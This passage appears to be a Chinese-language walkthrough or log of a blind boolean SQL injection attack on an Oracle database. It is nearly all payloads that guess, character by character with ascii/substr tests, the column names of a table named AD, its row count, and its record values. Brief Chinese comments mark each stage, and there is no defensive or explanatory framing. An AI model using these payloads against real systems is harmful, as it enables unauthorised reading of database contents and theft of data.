And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))



 以下为猜解第一列第一个字段的第三位为:A

And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))



And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))



And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))



 以下为猜解第二列:

And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 76>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 88=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 88>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 89=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)



第一个记录的第一位值为:

4、 猜解数据值:

 数据值长度为一位:1

And 0<=nvl(length((SELECT COUNT(*)FROM AD)),0)

And 1>=nvl(length((SELECT COUNT(*)FROM AD)),0)

And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)

And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)

And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)


 数据长度为:9条记录
And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))


以下猜解记录值

 第一行第一列记录的长度为:1,值为:1
And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))



 第一行第一列记录的长度为:1,值为:2

And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

